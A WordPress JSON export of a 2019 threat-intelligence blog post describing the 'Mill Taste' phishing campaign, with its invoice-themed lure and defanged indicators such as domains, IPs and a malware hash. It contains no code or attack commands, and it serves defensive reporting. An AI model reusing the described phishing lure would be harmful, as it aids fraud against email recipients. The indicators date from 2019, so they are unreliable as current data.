{"id":341,"date":"2019-10-28T00:00:00","date_gmt":"2019-10-28T00:00:00","guid":{"rendered":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/"},"modified":"2024-06-23T23:06:27","modified_gmt":"2024-06-23T23:06:27","slug":"the-mill-taste-campaign","status":"publish","type":"post","link":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","title":{"rendered":"The &#8220;Mill Taste&#8221; Campaign"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"341\" class=\"elementor elementor-341\" data-elementor-post-type=\"post\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4ee363ae e-flex e-con-boxed e-con e-parent\" data-id=\"4ee363ae\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-263187af elementor-widget elementor-widget-text-editor\" data-id=\"263187af\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a sweet potato or yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa Henry\u201d who is sending a \u201ccopy\u201d of a paid invoice. The email has a PDF attached and arrives with the subject line: Paid Invoice TT Copy. 
Based on my link analysis, the PDF is infected with malware, which is described below.<\/p><h3><strong>Phishing Campaign Cyber Observables<\/strong><\/h3><p>The phishing domain is: elmolinosabor[.]com<\/p><p>The phishing IP is: 146.112.61[.]107<\/p><h3><strong>Recent DNS History<\/strong><\/h3><p>The threat actor appears to have begun building his infrastructure on February 1, 2019, using an admin panel labeled \u201cl5fa7189.justinstalledpanel.com\u201d at IP: 94.102.60.165. From the DNS history tracked by [<span style=\"color: #3366ff;\"><em>redacted<\/em><\/span>], it appears that the initial test run of the malicious infrastructure was on June 5<sup>th<\/sup> and 8<sup>th<\/sup> from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.<\/p><p>The splash page for all three of these events shows the same \u2018Welcome!\u2019 placeholder.<\/p><p>According to the [<em><span style=\"color: #3366ff;\">redacted<\/span><\/em>] tool, the autonomous system network for the above-noted IP is AS202425, which is exhibiting multiple security issues including:<\/p><ul><li>Route leaks (4)<\/li><li>Hijacks (111)<\/li><li>DDoS Amplifiers (326)<\/li><li>Static Loops (5)<\/li><\/ul><h3><strong>Malware Artifacts<\/strong><\/h3><p>The most recently seen malware artifact as documented on [<span style=\"color: #3366ff;\"><em>redacted<\/em><\/span>] was the following WIN32 executable: scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9). As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious, including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. 
It is being characterized as a &#8220;heuristic&#8221;\u00a0 &#8220;downloader&#8221; and a &#8220;Grandcrab.AF&#8221; Trojan.<\/p><p>As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous &#8220;communicating&#8221; and referring nodes also associated with the .zz node identified by [<em><span style=\"color: #3366ff;\">redacted<\/span><\/em>] as Hanover Hospital.\u00a0 The Cyber Observables for this campaign are given below.<\/p><p>Contact <a href=\"https:\/\/ctin.us\/site\/about-us\/contact\/\" target=\"_blank\" rel=\"noopener noreferrer\">CTIN<\/a> for more information and the complete list of Cyber Observables of the Mill Taste Campaign.<\/p><h3><strong>Dropper Site Cyber Observables<\/strong><\/h3><h3>Communicating Nodes Cyber Observables<\/h3>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.\u00a0 The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4265,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"elementor_theme","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[229],"tags":[152],"class_list":["post-341","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware","tag-malware"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO Pro 4.9.5.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Jane Ginn\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO Pro (AIOSEO) 4.9.5.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"CTIN - Cybersecurity Center\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"The \u201cMill Taste\u201d Campaign - CTIN\" \/>\n\t\t<meta property=\"og:description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<meta property=\"og:image:width\" content=\"112\" \/>\n\t\t<meta property=\"og:image:height\" content=\"112\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-28T00:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2024-06-23T23:06:27+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary\" \/>\n\t\t<meta name=\"twitter:site\" content=\"@CTIN_Global\" \/>\n\t\t<meta name=\"twitter:title\" content=\"The \u201cMill Taste\u201d Campaign - CTIN\" \/>\n\t\t<meta name=\"twitter:description\" content=\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa\" \/>\n\t\t<meta name=\"twitter:creator\" content=\"@CTIN_Global\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BlogPosting\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#blogposting\",\"name\":\"The \\u201cMill Taste\\u201d Campaign - CTIN\",\"headline\":\"The &#8220;Mill Taste&#8221; Campaign\",\"author\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/GlobalConnections-RightSize.jpg\",\"width\":1680,\"height\":836},\"datePublished\":\"2019-10-28T00:00:00+00:00\",\"dateModified\":\"2024-06-23T23:06:27+00:00\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\"},\"articleSection\":\"Malware, 
malware\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"name\":\"Posts\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"position\":2,\"name\":\"Posts\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"name\":\"COTH\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"position\":3,\"name\":\"COTH\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"name\":\"Malware\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/blog\\\/posts\\\/#listItem\",\"name\":\"Posts\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"position\":4,\"name\":\"Malware\",\"item\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/\",\
"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#listItem\",\"name\":\"The &#8220;Mill Taste&#8221; Campaign\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/#listItem\",\"name\":\"COTH\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#listItem\",\"position\":5,\"name\":\"The &#8220;Mill Taste&#8221; Campaign\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/category\\\/coth\\\/malware\\\/#listItem\",\"name\":\"Malware\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\",\"name\":\"Cyber Threat Intelligence Network\",\"description\":\"Cybersecurity Center\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/\",\"telephone\":\"+14804624039\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/cropped-cropped-2020-logo.png\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#organizationLogo\",\"width\":757,\"height\":237},\"image\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#organizationLogo\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/CyberThreatIntelligenceNetwork\\\/\",\"https:\\\/\\\/twitter.com\\\/CTIN_Global\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/janeginn\\\/\",\"https:\\\/\\\/bsky.app\\\/profile\\\/janeginn.bsky.social\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\",\"url\":\"https:\\\/\\\/cyberthreatinte
lligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/\",\"name\":\"Jane Ginn\",\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/07\\\/rjg-PhonePhoto.PNG\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/CTIN_Global\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/janeginn\\\/\",\"https:\\\/\\\/bsky.app\\\/profile\\\/janeginn.bsky.social\",\"https:\\\/\\\/infosec.exchange\\\/@ctin\"],\"description\":\"As the co-founder of the US-based Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. Her work with the Cyber Threat Intelligence (CTI) technical committee earned her the 2020 Distinguished Contributor award from OASIS. She is currently supporting the analysis services of Datos Insights, an advisory firm focusing on the financial services sector. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. 
Follow me on LinkedIn\",\"jobTitle\":\"CTIN President & Co-Founder\",\"alumniOf\":[{\"@type\":\"EducationalOrganization\",\"name\":\"Norwich University\",\"sameAs\":\"https:\\\/\\\/online.norwich.edu\\\/online\\\/programs-courses\\\/programs\\\/master-science-cybersecurity\"}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#webpage\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/\",\"name\":\"The \\u201cMill Taste\\u201d Campaign - CTIN\",\"description\":\"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \\u201cMill Taste\\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \\u201cAccounting Manager\\u201d by the name of \\u201cMelissa\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/author\\\/neffie\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/wp-content\\\/uploads\\\/2024\\\/06\\\/GlobalConnections-RightSize.jpg\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#mainImage\",\"width\":1680,\"height\":836},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/index.php\\\/2019\\\/10\\\/28\\\/the-mill-taste-campaign\\\/#mainImage\"},\"dateP
ublished\":\"2019-10-28T00:00:00+00:00\",\"dateModified\":\"2024-06-23T23:06:27+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#website\",\"url\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/\",\"name\":\"Training Center\",\"description\":\"Cybersecurity Center\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/cyberthreatintelligencenetwork.com\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO Pro -->\r\n\t\t<title>The \u201cMill Taste\u201d Campaign - CTIN<\/title>\n\n","aioseo_head_json":{"title":"The \u201cMill Taste\u201d Campaign - CTIN","description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","canonical_url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BlogPosting","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#blogposting","name":"The \u201cMill Taste\u201d Campaign - CTIN","headline":"The &#8220;Mill Taste&#8221; 
Campaign","author":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"publisher":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/06\/GlobalConnections-RightSize.jpg","width":1680,"height":836},"datePublished":"2019-10-28T00:00:00+00:00","dateModified":"2024-06-23T23:06:27+00:00","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage"},"isPartOf":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage"},"articleSection":"Malware, malware"},{"@type":"BreadcrumbList","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com#listItem","position":1,"name":"Home","item":"https:\/\/cyberthreatintelligencenetwork.com","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","name":"Posts"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","position":2,"name":"Posts","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","name":"COTH"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","position":3,"name":"COTH","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwor
k.com\/index.php\/category\/coth\/malware\/#listItem","name":"Malware"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/blog\/posts\/#listItem","name":"Posts"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/#listItem","position":4,"name":"Malware","item":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/","nextItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#listItem","name":"The &#8220;Mill Taste&#8221; Campaign"},"previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/#listItem","name":"COTH"}},{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#listItem","position":5,"name":"The &#8220;Mill Taste&#8221; Campaign","previousItem":{"@type":"ListItem","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/category\/coth\/malware\/#listItem","name":"Malware"}}]},{"@type":"Organization","@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization","name":"Cyber Threat Intelligence Network","description":"Cybersecurity 
Center","url":"https:\/\/cyberthreatintelligencenetwork.com\/","telephone":"+14804624039","logo":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2021\/01\/cropped-cropped-2020-logo.png","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#organizationLogo","width":757,"height":237},"image":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#organizationLogo"},"sameAs":["https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/","https:\/\/twitter.com\/CTIN_Global","https:\/\/www.linkedin.com\/in\/janeginn\/","https:\/\/bsky.app\/profile\/janeginn.bsky.social"]},{"@type":"Person","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author","url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/","name":"Jane Ginn","image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/07\/rjg-PhonePhoto.PNG"},"sameAs":["https:\/\/x.com\/CTIN_Global","https:\/\/www.linkedin.com\/in\/janeginn\/","https:\/\/bsky.app\/profile\/janeginn.bsky.social","https:\/\/infosec.exchange\/@ctin"],"description":"As the co-founder of the US-based Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. Her work with the Cyber Threat Intelligence (CTI) technical committee earned her the 2020 Distinguished Contributor award from OASIS. She is currently supporting the analysis services of Datos Insights, an advisory firm focusing on the financial services sector. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. 
In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn","jobTitle":"CTIN President & Co-Founder","alumniOf":[{"@type":"EducationalOrganization","name":"Norwich University","sameAs":"https:\/\/online.norwich.edu\/online\/programs-courses\/programs\/master-science-cybersecurity"}]},{"@type":"WebPage","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#webpage","url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","name":"The \u201cMill Taste\u201d Campaign - CTIN","description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#website"},"breadcrumb":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#breadcrumblist"},"author":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"creator":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/author\/neffie\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/06\/GlobalConnections-RightSize.jpg","@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#mainImage","width":1680,"height":836},"primaryImageOfPage":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/#mainImage"},"datePublished":"2019-10-28T00:00:00+00:00","dateModified":"2024-06-23T23:06:27+00:00"},{"@type":"WebSite","@id":"https:\/\/cyberthreatintelligencenetwork.com\/#website","url":"https:\/\/cyberthreatintelligencenetwork.com\/","name":"Training Center","description":"Cybersecurity Center","inLanguage":"en-US","publisher":{"@id":"https:\/\/cyberthreatintelligencenetwork.com\/#organization"}}]},"og:locale":"en_US","og:site_name":"CTIN - Cybersecurity Center","og:type":"article","og:title":"The \u201cMill Taste\u201d Campaign - CTIN","og:description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","og:url":"https:\/\/cyberthreatintelligencenetwork.com\/index.php\/2019\/10\/28\/the-mill-taste-campaign\/","og:image":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png","og:image:secure_url":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png","og:image:width":112,"og:image:height":112,"article:published_time":"2019-10-28T00:00:00+00:00","article:modified_time":"2024-06-23T23:06:27+00:00","article:publisher":"https:\/\/www.facebook.com\/CyberThreatIntelligenceNetwork\/","twitter:card":"summary","twitter:site":"@CTIN_Global","twitter:title":"The \u201cMill Taste\u201d Campaign - CTIN","twitter:description":"An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: \u201cMill Taste\u201d) and shows a close-up of a Sweet Potato or Yam on the landing page of the website. 
The social engineering approach is an email from an \u201cAccounting Manager\u201d by the name of \u201cMelissa","twitter:creator":"@CTIN_Global","twitter:image":"https:\/\/cyberthreatintelligencenetwork.com\/wp-content\/uploads\/2024\/05\/SocialShare-Image.png"},"aioseo_meta_data":{"post_id":"341","title":null,"description":null,"keywords":null,"keyphrases":{"focus":{"keyphrase":"","score":0,"analysis":{"keyphraseInTitle":{"score":0,"maxScore":9,"error":1}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"BlogPosting","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"seo_analyzer_scan_date":"2025-08-25 
